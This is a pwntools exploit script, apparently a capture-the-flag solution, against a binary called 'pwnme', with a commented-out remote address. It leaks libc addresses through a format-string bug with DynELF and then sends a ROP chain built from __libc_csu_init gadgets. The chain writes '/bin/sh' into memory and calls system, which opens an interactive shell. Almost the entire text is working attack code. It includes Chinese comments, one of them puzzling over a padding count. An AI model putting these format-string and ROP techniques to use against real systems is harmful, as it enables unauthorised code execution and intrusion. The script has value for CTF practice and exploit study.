1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53
| from pwn import*
#p=remote('106.75.2.53', 10006) p= process('./pwnme')
def leak(addr): p.recvuntil('>') p.sendline('2') p.recvuntil('please input new username(max lenth:20): \n') p.sendline('aaaa') p.recvuntil('please input new password(max lenth:20): \n') payload1 = '%12$s' + 'BIRDGO!' + p64(addr) p.send(payload1) p.recvuntil('>') p.sendline('1') content = p.recvuntil('BIRDGO!') if len(content) == 12: return '\x00' else: return content[5:-7] #泄露system地址 p.recvuntil('Input your username(max lenth:40): \n') p.sendline('A') p.recvuntil('Input your password(max lenth:40): \n') p.sendline('1')
d=DynELF(leak,elf=ELF('./pwnme')) system_addr=d.lookup('system','libc') log.info('system_addr:%#x'%system_addr)
p.recvuntil('>') p.sendline('2') p.recvuntil('please input new username(max lenth:20): \n') p.sendline('cccc') p.recvuntil('please input new password(max lenth:20): \n')
pppppr=0x0000000000400ecb pop_rdi_ret=0x0000000000400ed3 init_addr=0x400EB0 binsh_addr=0x0000000000602000 read_got=0x0000000000601FC8
payload='a'*0x28 payload+=p64(pppppr)+p64(1)+p64(read_got)+p64(0x8)+p64(binsh_addr)+p64(0) //__libc_csu_init() payload+=p64(init_addr)+p64(0)*7 //这里为啥是7??? payload+=p64(pop_rdi_ret)+p64(binsh_addr)+p64(system_addr) payload=payload.ljust(0x101,'a')
p.sendline(payload) p.sendline('/bin/sh\x00')
p.interactive()
|